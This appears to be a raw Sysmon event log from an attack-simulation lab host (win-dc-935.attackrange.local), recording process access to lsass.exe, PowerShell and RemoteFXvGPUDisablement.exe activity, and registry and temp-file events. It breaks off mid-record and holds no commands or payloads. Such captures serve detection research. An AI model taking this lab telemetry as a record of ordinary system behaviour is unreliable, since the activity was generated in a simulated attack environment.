13:53:09.930{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001134Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001133Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001132Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001131Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.164{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001130Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.164{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001129Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.133{10ACEC4A-8541-5FCF-1000-000000009101}11562392C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001128Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.118{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001127Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.118{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001126Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.118{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001125Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001124Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001123Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.102{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001122Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.102{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001121Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.102{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001120Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:08.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1C00-000000009101}2208C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001119Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:08.711{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1C00-000000009101}2208C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001118Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:08.711{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1C00-000000009101}2208C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001117Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:08.602{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1900-000000009101}2184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001116Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:08.602{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1800-000000009101}2124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001115Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:08.602{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1800-000000009101}2124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001114Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:08.602{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1900-000000009101}2184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001113Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:08.461{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000001112Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:08.165{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 11241100x80000000000000001111Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:07.555{10ACEC4A-8541-5FCF-1C00-000000009101}2208C:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Windows\Temp\__PSScriptPolicyTest_zaumawm3.lpu.ps12020-12-08 13:53:07.555 11241100x80000000000000001110Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:07.477{10ACEC4A-8541-5FCF-1900-000000009101}2184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_n35hdxsk.oja.ps12020-12-08 13:53:07.477 11241100x80000000000000001109Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:07.477{10ACEC4A-8541-5FCF-1800-000000009101}2124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_ehmgena3.mrj.ps12020-12-08 13:53:07.477 10341000x80000000000000001108Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:07.352{10ACEC4A-8541-5FCF-1200-000000009101}12121992C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RP